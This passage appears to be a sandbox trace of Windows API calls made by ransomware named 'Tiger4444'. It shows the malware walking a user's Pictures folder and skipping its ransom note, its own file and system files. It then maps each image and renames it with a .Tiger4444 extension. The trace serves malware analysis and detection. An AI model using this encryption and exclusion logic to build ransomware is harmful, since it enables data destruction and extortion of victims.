lpPerformanceCount=0x30abf30*=13703382760) returned 1 [0045.581] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=59196) returned 1 [0045.581] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.581] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0045.581] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xea40, lpName=0x0) returned 0x2c8 [0045.581] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xea40) returned 0xbe0000 [0045.583] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.583] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.583] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0045.583] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0045.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.583] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13703655500) returned 1 [0045.584] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.584] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0045.584] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.584] CloseHandle (hObject=0x2c8) returned 1 [0045.584] CloseHandle (hObject=0x260) returned 1 [0045.587] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\Hsyb4EvKfZDCo8.gif.Tiger4444") returned 53 [0045.587] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Hsyb4EvKfZDCo8.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\hsyb4evkfzdco8.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Hsyb4EvKfZDCo8.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\hsyb4evkfzdco8.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.588] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=59200 | out: Addend=0xc6f980) returned 17245936 [0045.588] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4496 [0045.588] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc68cdfd0, ftCreationTime.dwHighDateTime=0x1d4caa6, ftLastAccessTime.dwLowDateTime=0xb5a781a0, ftLastAccessTime.dwHighDateTime=0x1d4cb6b, ftLastWriteTime.dwLowDateTime=0xb5a781a0, ftLastWriteTime.dwHighDateTime=0x1d4cb6b, nFileSizeHigh=0x0, nFileSizeLow=0x14f0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i2jPXe_5_EmayX-juQ.jpg", cAlternateFileName="I2JPXE~1.JPG")) returned 1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="Tiger4444.exe") returned -1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2=".") returned 1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="..") returned 1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="windows") returned -1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="bootmgr") returned 1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="pagefile.sys") returned -1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="boot") returned 1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="ids.txt") returned -1 [0045.588] lstrcmpiW (lpString1="i2jPXe_5_EmayX-juQ.jpg", lpString2="NTUSER.DAT") returned -1 [0045.588] lstrcpyW (in: lpString1=0x30aeada, lpString2="i2jPXe_5_EmayX-juQ.jpg" | out: lpString1="i2jPXe_5_EmayX-juQ.jpg") returned="i2jPXe_5_EmayX-juQ.jpg" [0045.588] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\i2jPXe_5_EmayX-juQ.jpg", dwFileAttributes=0x0) returned 1 [0045.588] lstrlenW (lpString="i2jPXe_5_EmayX-juQ.jpg") returned 22 [0045.588] lstrlenW (lpString="Tiger4444") returned 9 [0045.588] lstrcmpiW (lpString1="X-juQ.jpg", lpString2="Tiger4444") returned 1 [0045.588] lstrlenW (lpString=".dll") returned 4 [0045.588] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.589] lstrlenW (lpString=".lnk") returned 4 [0045.589] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.589] lstrlenW (lpString=".ini") returned 4 [0045.589] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.589] lstrlenW (lpString=".sys") returned 4 [0045.589] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\i2jPXe_5_EmayX-juQ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\i2jpxe_5_emayx-juq.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.590] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.590] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13704286871) returned 1 [0045.590] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=85775) returned 1 [0045.590] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.590] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0045.590] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15210, lpName=0x0) returned 0x2c8 [0045.590] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15210) returned 0xbe0000 [0045.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.593] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.593] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.593] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.593] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.593] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13704620184) returned 1 [0045.593] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.593] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0045.593] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.594] CloseHandle (hObject=0x2c8) returned 1 [0045.594] CloseHandle (hObject=0x260) returned 1 [0045.596] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\i2jPXe_5_EmayX-juQ.jpg.Tiger4444") returned 57 [0045.596] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\i2jPXe_5_EmayX-juQ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\i2jpxe_5_emayx-juq.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\i2jPXe_5_EmayX-juQ.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\i2jpxe_5_emayx-juq.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.598] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=85776 | out: Addend=0xc6f980) returned 17305136 [0045.598] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4498 [0045.598] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3374220, ftCreationTime.dwHighDateTime=0x1d4ce49, ftLastAccessTime.dwLowDateTime=0x3c7d4c50, ftLastAccessTime.dwHighDateTime=0x1d4d0cb, ftLastWriteTime.dwLowDateTime=0x3c7d4c50, ftLastWriteTime.dwHighDateTime=0x1d4d0cb, nFileSizeHigh=0x0, nFileSizeLow=0x18d62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJsVEnd5y-jq2.png", cAlternateFileName="IJSVEN~1.PNG")) returned 1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="Tiger4444.exe") returned -1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2=".") returned 1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="..") returned 1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="windows") returned -1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="bootmgr") returned 1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="pagefile.sys") returned -1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="boot") returned 1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="ids.txt") returned 1 [0045.598] lstrcmpiW (lpString1="iJsVEnd5y-jq2.png", lpString2="NTUSER.DAT") returned -1 [0045.598] lstrcpyW (in: lpString1=0x30aeada, lpString2="iJsVEnd5y-jq2.png" | out: lpString1="iJsVEnd5y-jq2.png") returned="iJsVEnd5y-jq2.png" [0045.598] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\iJsVEnd5y-jq2.png", dwFileAttributes=0x0) returned 1 [0045.598] lstrlenW (lpString="iJsVEnd5y-jq2.png") returned 17 [0045.598] lstrlenW (lpString="Tiger4444") returned 9 [0045.598] lstrcmpiW (lpString1="y-jq2.png", lpString2="Tiger4444") returned 1 [0045.598] lstrlenW (lpString=".dll") returned 4 [0045.599] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.599] lstrlenW (lpString=".lnk") returned 4 [0045.599] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.599] lstrlenW (lpString=".ini") returned 4 [0045.599] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.599] lstrlenW (lpString=".sys") returned 4 [0045.599] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\iJsVEnd5y-jq2.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ijsvend5y-jq2.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.599] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.599] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13705197342) returned 1 [0045.599] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=101730) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0045.599] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0045.599] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19070, lpName=0x0) returned 0x2c8 [0045.599] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19070) returned 0xbe0000 [0045.602] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.602] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.602] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.602] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.602] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.602] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.602] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.602] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.602] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13705506325) returned 1 [0045.602] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0045.602] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0045.602] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.603] CloseHandle (hObject=0x2c8) returned 1 [0045.603] CloseHandle (hObject=0x260) returned 1 [0045.608] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\iJsVEnd5y-jq2.png.Tiger4444") returned 52 [0045.608] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\iJsVEnd5y-jq2.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ijsvend5y-jq2.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\iJsVEnd5y-jq2.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\ijsvend5y-jq2.png.tiger4444"), dwFlags=0x1) returned 1 [0045.609] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=101744 | out: Addend=0xc6f980) returned 17390912 [0045.609] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4501 [0045.609] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8da25250, ftCreationTime.dwHighDateTime=0x1d4ce83, ftLastAccessTime.dwLowDateTime=0x383254e0, ftLastAccessTime.dwHighDateTime=0x1d4c8b7, ftLastWriteTime.dwLowDateTime=0x383254e0, ftLastWriteTime.dwHighDateTime=0x1d4c8b7, nFileSizeHigh=0x0, nFileSizeLow=0x102a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iKlWqFav.png", cAlternateFileName="")) returned 1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="Tiger4444.exe") returned -1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2=".") returned 1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="..") returned 1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="windows") returned -1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="bootmgr") returned 1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="pagefile.sys") returned -1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="boot") returned 1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="ids.txt") returned 1 [0045.609] lstrcmpiW (lpString1="iKlWqFav.png", lpString2="NTUSER.DAT") returned -1 [0045.609] lstrcpyW (in: lpString1=0x30aeada, lpString2="iKlWqFav.png" | out: lpString1="iKlWqFav.png") returned="iKlWqFav.png" [0045.609] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\iKlWqFav.png", dwFileAttributes=0x0) returned 1 [0045.610] lstrlenW (lpString="iKlWqFav.png") returned 12 [0045.610] lstrlenW (lpString="Tiger4444") returned 9 [0045.610] lstrcmpiW (lpString1="WqFav.png", lpString2="Tiger4444") returned 1 [0045.610] lstrlenW (lpString=".dll") returned 4 [0045.610] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.610] lstrlenW (lpString=".lnk") returned 4 [0045.610] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.610] lstrlenW (lpString=".ini") returned 4 [0045.610] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.610] lstrlenW (lpString=".sys") returned 4 [0045.610] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.610] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\iKlWqFav.png" (normalized: "c:\\users\\fd1hvy\\pictures\\iklwqfav.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.610] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.610] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13706328877) returned 1 [0045.610] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=66213) returned 1 [0045.610] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0045.610] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0045.610] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x105b0, lpName=0x0) returned 0x2c8 [0045.610] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x105b0) returned 0xbe0000 [0045.612] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.612] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.612] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.612] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.612] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.612] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13706555587) returned 1 [0045.613] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0045.613] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0045.613] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.613] CloseHandle (hObject=0x2c8) returned 1 [0045.613] CloseHandle (hObject=0x260) returned 1 [0045.615] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\iKlWqFav.png.Tiger4444") returned 47 [0045.615] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\iKlWqFav.png" (normalized: "c:\\users\\fd1hvy\\pictures\\iklwqfav.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\iKlWqFav.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\iklwqfav.png.tiger4444"), dwFlags=0x1) returned 1 [0045.616] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=66224 | out: Addend=0xc6f980) returned 17492656 [0045.616] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4504 [0045.616] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa998bc60, ftCreationTime.dwHighDateTime=0x1d4c8fc, ftLastAccessTime.dwLowDateTime=0x4a032670, ftLastAccessTime.dwHighDateTime=0x1d4c62f, ftLastWriteTime.dwLowDateTime=0x4a032670, ftLastWriteTime.dwHighDateTime=0x1d4c62f, nFileSizeHigh=0x0, nFileSizeLow=0x16a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JHLKfbZ_wnxI.jpg", cAlternateFileName="JHLKFB~1.JPG")) returned 1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="Tiger4444.exe") returned -1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2=".") returned 1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="..") returned 1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="windows") returned -1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="bootmgr") returned 1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="pagefile.sys") returned -1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="boot") returned 1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="ids.txt") returned 1 [0045.616] lstrcmpiW (lpString1="JHLKfbZ_wnxI.jpg", lpString2="NTUSER.DAT") returned -1 [0045.616] lstrcpyW (in: lpString1=0x30aeada, lpString2="JHLKfbZ_wnxI.jpg" | out: lpString1="JHLKfbZ_wnxI.jpg") returned="JHLKfbZ_wnxI.jpg" [0045.616] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\JHLKfbZ_wnxI.jpg", dwFileAttributes=0x0) returned 1 [0045.617] lstrlenW (lpString="JHLKfbZ_wnxI.jpg") returned 16 [0045.617] lstrlenW (lpString="Tiger4444") returned 9 [0045.617] lstrcmpiW (lpString1="_wnxI.jpg", lpString2="Tiger4444") returned -1 [0045.617] lstrlenW (lpString=".dll") returned 4 [0045.617] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.617] lstrlenW (lpString=".lnk") returned 4 [0045.617] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.617] lstrlenW (lpString=".ini") returned 4 [0045.617] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.617] lstrlenW (lpString=".sys") returned 4 [0045.617] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.617] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\JHLKfbZ_wnxI.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\jhlkfbz_wnxi.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.617] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.617] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13707003344) returned 1 [0045.617] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=92764) returned 1 [0045.617] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0045.617] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0045.617] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16d60, lpName=0x0) returned 0x2c8 [0045.617] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16d60) returned 0xbe0000 [0045.619] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.619] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.619] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.619] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.619] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.619] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.619] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.619] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.619] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13707240500) returned 1 [0045.619] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0045.619] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0045.619] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.620] CloseHandle (hObject=0x2c8) returned 1 [0045.620] CloseHandle (hObject=0x260) returned 1 [0045.623] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\JHLKfbZ_wnxI.jpg.Tiger4444") returned 51 [0045.623] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\JHLKfbZ_wnxI.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\jhlkfbz_wnxi.jpg"), 